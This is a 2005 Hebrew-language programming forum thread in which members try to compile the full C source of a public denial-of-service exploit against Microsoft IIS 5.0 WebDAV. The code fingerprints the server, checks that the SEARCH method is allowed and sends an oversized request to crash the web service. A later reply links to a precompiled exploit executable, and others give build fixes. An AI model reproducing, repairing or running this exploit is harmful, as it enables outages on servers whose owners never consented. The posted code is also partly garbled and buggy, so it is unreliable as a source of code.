| כותב |
|
ShadowBeast
אחראי פורומים
הצטרף / הצטרפה: 22 January 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 1073
|
| נשלח בתאריך: 07 May 2005 בשעה 17:11 | | IP רשוּם
|
|
|
|
ניסיתי לקמפל אותו ב DEV בboralnd וב VC++ 2005 beta 2
dev נתן לי בעיית לינקר
borland נתן לי גם איזה בעייה אני לא זוכר ואני לא יכול לבדוק כי הוא נדפק לי
VC++ אמר לי שלא כללתי איזה אינקלוד אז כללתי אותו
ואחרי שכללתי אותו אז הוא לא מצא לי את windows.h ו winsock.h אז העפתי אותם
ואז הוא מן הסתם לא ידע מה לעשות עם הרבה פונקציות שאמורות להיות בהאדרים האלה
בכל מקרה הנה הקובץ:
קוד:
/*
Micro$oft IIS DoSser (restarts Web/FTP/Mail service .Terminates all active Web/FTP/Mail connections....ph33r ;-) )
>> by Shashank Pandey a.k.a +(Neo1)+
>> http://geekgroove.8m.com
Issue : http://packetstorm.linuxsecurity.com/0305-exploits/iisDoS.tx t
coded in seconds .... crappy programming but worx !
shoutz to all da babes in delhi :-)
>> Only for tezting purposes !!! i disclaim everything ....
part of M4TR1X series of codes from me... ph33r again...;-)
*/
#include <stdfx.h>
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
void graphitte()
{printf("\n********************************** ");
printf("\n Webdav MICRO$OFT IIS DoSser * \n");
printf("+++++++++++++++++++++++++++++++++*\n");
printf(" by Shashank Pandey *\n");
printf(" (reach_shash@linuxmail.org) *\n");
printf("********************************** \n");
}
char *funk(char tobesent[100],char *host)
{
int s; char got[100];
WSADATA wsaData;
struct hostent *yo;
struct sockaddr_in heck;
char lala[100];
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return 0;
}
if ((yo = gethostbyname(host))==0){
printf("error: can't resolve '%s'",host);
return 0;
}
heck.sin_port = htons(80);
heck.sin_family = AF_INET;
heck.sin_addr = *((struct in_addr *)yo->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("Error: Unable to create socket");
}
if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){
printf("Error: Cudn't Connect\r\n");
}
memset(lala,0,sizeof(lala));
sprintf(lala,"%s",tobesent,sizeof(tobesent));
send(s,lala,strlen(lala),0);
recv(s,got,100,0);
return 0;
closesocket(s);
WSACleanup();
printf("done.\n");
}
int main(int argc, char *argv[])
{
WSADATA wsaData;
int s;char mysend[100];
char *gotme;
char trash[100];
struct hostent *yo;
struct sockaddr_in heck;
char buffer[65535] ="";
char myrequest[80000];
char content[] =
&nbs p; "<?xml version=\"1.0\"?>\r\n"
&nbs p; "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
&nbs p; "<g:sql>\r\n"
&nbs p; "Select \"DAV:displayname\" from scope()\r\n"
&nbs p; "</g:sql>\r\n"
&nbs p; "</g:searchrequest>\r\n";
graphitte();
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("Error :Cudn't initiate winsock!");
return 0;
}
if(argc<2)
{printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]);
exit(0);}
if ( (yo = gethostbyname(argv[1]))==0)
{
printf("error: can't resolve '%s'",argv[1]);
return 1;
}
printf("\nChecking web server %s\n",argv[1]);
gotme=(char *)funk("GET / HTTP/1.0\r\n\n",argv[1]);
if (strstr(gotme,"IIS/5.0") == NULL)
{ printf("\n\r----> %s is not running IIS 5.0! adios !\n",argv[1]); }
else
{
printf("\n\r----> Aww rite! IIS 5.0 found on %s !\n",argv[1]);
sprintf(mysend,"SEARCH / HTTP/1.0\r\n\n",40);
gotme=(char *)funk(mysend,argv[1]);
if (strstr(gotme,"HTTP/1.1 411 Length Required") != NULL)
{ printf("\n\r----> METHOD SEARCH ALLOWED\r\n"); }
else
{
printf("\n----> Method SEARCH not Allowed ! adios...\n");
exit(0);
}
heck.sin_port = htons(80);
heck.sin_family = AF_INET;
heck.sin_addr = *((struct in_addr *)yo->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}
if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){
printf("Error:Cudn't Connect\r\n");
return 1;
}
buffer[sizeof(buffer)]=0x00;
memset(buffer,'S',sizeof(buffer));
memset(myrequest,0,sizeof(myrequest));
memset(trash,0,sizeof(trash));
sprintf(myrequest,"SEARCH /%s
HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length:
",buffer,argv[1]);
sprintf(myrequest,"%s%d\r\n\r\n",myrequest,strlen(content));
printf("\r\nDoSsing the server...<pray>\n");
send(s,myrequest,strlen(myrequest),0);
send(s,content,strlen(content),0);
recv(s,trash,sizeof(trash),0);
if(trash[0]==0x00)
{
printf("Server is DoSsed! Now run !! F-B-eyee is after j00...\r\n");
}
else
printf("Server is prolly patched.\r\n");
closesocket(s);
}
WSACleanup();
return 1;
}
|
|
|
__________________
The highest knowledge is to know that we are surrounded by mystery - Albert Schweitzer
He who will not take the hint, must take the consequence - Glenn v. Covey (1854)
ShadowBeast
|
| חזרה לתחילת העמוד |
|
| |
אירי
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 15 May 2005 בשעה 00:43 | | IP רשוּם
|
|
|
|
קימפלתי ב dev
והוא מוסר שבשורה 118 יש מצביע לא מוכר nbs
באמת לא ראיתי שהצהרת עליו
יש עוד שגיאות שקשורות לזה שהוא לא מוכר
ב VC++ הוא לא הצליח לפתוח את stdfx.h
דרך אגב התוכנית ב C או C++
stdio שייך ל C, לא?
|
| חזרה לתחילת העמוד |
|
| |
רצח-לילי
משתמש מתחיל
הצטרף / הצטרפה: 18 April 2005
משתמש: מנותק/ת
הודעות: 29
|
| נשלח בתאריך: 15 May 2005 בשעה 16:13 | | IP רשוּם
|
|
|
|
dev מנסיון לפעמים נותן שגיאות שלא ממש קשורות. אני מנחש שזה נכתב בויזואל סי++. אם אני לא טועה מה שאתה מנסה לקמפל זה אקספלויט אבל לא ידוע לי הסביבת העבודה שלו אז יכול להיות שאתה להריץ cygwin או שיכול להיות שאתה צריך לעשות פרויקט ואז לעתיק את הקוד לשם. כי מוזר שהוא לא מוצא את stdfx.h
|
| חזרה לתחילת העמוד |
|
| |
cp77fk4r
מנהל פורומים
מנהל פורום אבטחת מידע
הצטרף / הצטרפה: 09 April 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 501
|
| נשלח בתאריך: 15 May 2005 בשעה 16:16 | | IP רשוּם
|
|
|
|
אני מאוד ממליץ למחוק את הדיון הנ"ל.
__________________
[Th3rE R mAnY wAyZ 2 r3aD oN3 EmPty p4gE]
|
| חזרה לתחילת העמוד |
|
| |
ניר
מנהל האתר
הצטרף / הצטרפה: 12 January 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 3296
|
| נשלח בתאריך: 15 May 2005 בשעה 16:18 | | IP רשוּם
|
|
|
|
cp77fk4r כתב:
| אני מאוד ממליץ למחוק את הדיון הנ"ל. |
|
|
אני לא רואה סיבה. דיון לגיטימי. השאלה נראת במקום
|
| חזרה לתחילת העמוד |
|
| |
ShadowBeast
אחראי פורומים
הצטרף / הצטרפה: 22 January 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 1073
|
| נשלח בתאריך: 15 May 2005 בשעה 20:41 | | IP רשוּם
|
|
|
|
באמת למה למחוק?
אני יכול להגיד שניסיתי בVC++ הבטא 2005 הזה
והוא באמת לא מצא את הקובץ הזה שאמרתם...
CP לפחות תגיד את הסיבה...
__________________
The highest knowledge is to know that we are surrounded by mystery - Albert Schweitzer
He who will not take the hint, must take the consequence - Glenn v. Covey (1854)
ShadowBeast
|
| חזרה לתחילת העמוד |
|
| |
cp77fk4r
מנהל פורומים
מנהל פורום אבטחת מידע
הצטרף / הצטרפה: 09 April 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 501
|
| נשלח בתאריך: 16 May 2005 בשעה 05:08 | | IP רשוּם
|
|
|
|
פאק, משום מה כשהגבתי היה כתוב (או לפחות כך דמיינתי) שפותח הטופיק (ShadowBeast) הוא אורח, אז המלצתי לסגור את הטופיק, מפני שזהו אקספלויט שמבצע DoS Attack על שרתי IIS, וחשבתי שזה סתם עוד איזה סקריפט-קידי שמנסה להריץ איזה אקספלויט ולא מצליח לו..
אבל עכשיו אני רואה שזה ShadowBeast, אז סבבה, אני לוקח את דברי בחזרה, מצטער.
__________________
[Th3rE R mAnY wAyZ 2 r3aD oN3 EmPty p4gE]
|
| חזרה לתחילת העמוד |
|
| |
ניר
מנהל האתר
הצטרף / הצטרפה: 12 January 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 3296
|
| נשלח בתאריך: 16 May 2005 בשעה 05:34 | | IP רשוּם
|
|
|
|
SB - יש התקדמות עם זה?
__________________
מספר האייסיקיו שלי ו/או כתובת ה-MSN שלי אינם מהווים מוקד תמיכה
|
| חזרה לתחילת העמוד |
|
| |
ShadowBeast
אחראי פורומים
הצטרף / הצטרפה: 22 January 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 1073
|
| נשלח בתאריך: 16 May 2005 בשעה 13:53 | | IP רשוּם
|
|
|
|
לצערי אני לא יודע לפתור בעיות לינקר...
גם בעיות קימפול רגילות אני בקושי פותר..
אז על לינקר?
בכלל אין לי כיוון
__________________
The highest knowledge is to know that we are surrounded by mystery - Albert Schweitzer
He who will not take the hint, must take the consequence - Glenn v. Covey (1854)
ShadowBeast
|
| חזרה לתחילת העמוד |
|
| |
cp77fk4r
מנהל פורומים
מנהל פורום אבטחת מידע
הצטרף / הצטרפה: 09 April 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 501
|
| נשלח בתאריך: 16 May 2005 בשעה 15:02 | | IP רשוּם
|
|
|
|
לינקר? אתה כניראה מתכוון לפויינטר.
ותיראה מה אירי כתב לך, לא הרצתי ת'קוד, אבל אם יש שם מצביע לא מוצהר- תצהיר עליו.
__________________
[Th3rE R mAnY wAyZ 2 r3aD oN3 EmPty p4gE]
|
| חזרה לתחילת העמוד |
|
| |
Alias
משתמש חבר
הצטרף / הצטרפה: 13 January 2005
משתמש: מנותק/ת
הודעות: 344
|
| נשלח בתאריך: 16 May 2005 בשעה 15:03 | | IP רשוּם
|
|
|
|
http://planet.nana.co.il/casper_2005/IISexp.exe נראה לי שיעבוד
|
| חזרה לתחילת העמוד |
|
| |
ShadowBeast
אחראי פורומים
הצטרף / הצטרפה: 22 January 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 1073
|
| נשלח בתאריך: 16 May 2005 בשעה 15:55 | | IP רשוּם
|
|
|
|
cp77fk4r כתב:
לינקר? אתה כניראה מתכוון לפויינטר.
ותיראה מה אירי כתב לך, לא הרצתי ת'קוד, אבל אם יש שם מצביע לא מוצהר- תצהיר עליו. |
|
|
לא, אני מתכוון ללינקר =\
תנסו לקמפל בבורלנד ותראו(אגב גם ב DEV) הפוינטר זה רק הזהרה, ובבורלנד היא לא מופיעה
__________________
The highest knowledge is to know that we are surrounded by mystery - Albert Schweitzer
He who will not take the hint, must take the consequence - Glenn v. Covey (1854)
ShadowBeast
|
| חזרה לתחילת העמוד |
|
| |
ShadowBeast
אחראי פורומים
הצטרף / הצטרפה: 22 January 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 1073
|
| נשלח בתאריך: 16 May 2005 בשעה 15:59 | | IP רשוּם
|
|
|
|
Alias כתב:
| http://planet.nana.co.il/casper_2005/IISexp.exe נראה לי שיעבוד |
|
|
וואי תודה!!!
איפה קימפלת את זה?
__________________
The highest knowledge is to know that we are surrounded by mystery - Albert Schweitzer
He who will not take the hint, must take the consequence - Glenn v. Covey (1854)
ShadowBeast
|
| חזרה לתחילת העמוד |
|
| |
Alias
משתמש חבר
הצטרף / הצטרפה: 13 January 2005
משתמש: מנותק/ת
הודעות: 344
|
| נשלח בתאריך: 16 May 2005 בשעה 17:30 | | IP רשוּם
|
|
|
|
VC++
|
| חזרה לתחילת העמוד |
|
| |
ShadowBeast
אחראי פורומים
הצטרף / הצטרפה: 22 January 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 1073
|
| נשלח בתאריך: 16 May 2005 בשעה 18:48 | | IP רשוּם
|
|
|
|
ומה עם זה שהוא לא מוצא?
__________________
The highest knowledge is to know that we are surrounded by mystery - Albert Schweitzer
He who will not take the hint, must take the consequence - Glenn v. Covey (1854)
ShadowBeast
|
| חזרה לתחילת העמוד |
|
| |
Alias
משתמש חבר
הצטרף / הצטרפה: 13 January 2005
משתמש: מנותק/ת
הודעות: 344
|
| נשלח בתאריך: 16 May 2005 בשעה 20:36 | | IP רשוּם
|
|
|
|
רמז: google 
|
| חזרה לתחילת העמוד |
|
| |
ShadowBeast
אחראי פורומים
הצטרף / הצטרפה: 22 January 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 1073
|
| נשלח בתאריך: 16 May 2005 בשעה 21:39 | | IP רשוּם
|
|
|
|
OK...
למה אתה לא יכול פשוט לרשום אני לא יודע
__________________
The highest knowledge is to know that we are surrounded by mystery - Albert Schweitzer
He who will not take the hint, must take the consequence - Glenn v. Covey (1854)
ShadowBeast
|
| חזרה לתחילת העמוד |
|
| |
Alias
משתמש חבר
הצטרף / הצטרפה: 13 January 2005
משתמש: מנותק/ת
הודעות: 344
|
| נשלח בתאריך: 16 May 2005 בשעה 22:09 | | IP רשוּם
|
|
|
|
חיפשתי את הערך stdfx.h source מצאתי אותו, שמרתי בסיפריה include ואז ראיתי שהוא מחפש עוד קובץ config.h, מצאתי אותו ושמרתי במיקום שהוא אמור להיות וזהו.
והתשובה לשאלה שלך: תאמת אין לי מושג, אולי כדי שתתאמץ טיפה יותר ותגיע לפתרון בעצמך 
|
| חזרה לתחילת העמוד |
|
| |
ShadowBeast
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 17 May 2005 בשעה 09:19 | | IP רשוּם
|
|
|
|
כאלה דברים אני דווקא עושה הרבה...
בעיקר עשיתי פעם
אז למדתי גם כמה שיטות שיהיה לך לעתיד:
במקום לכתוב
name-of-file.h
תכתוב
inurl:"name-of-file.h"
|
| חזרה לתחילת העמוד |
|
| |
נושאים פעילים
רשימת משתמשים
חיפוש
עזרה
הרשמה
התחברות
UnderWarrior Forums : 
תיכנות
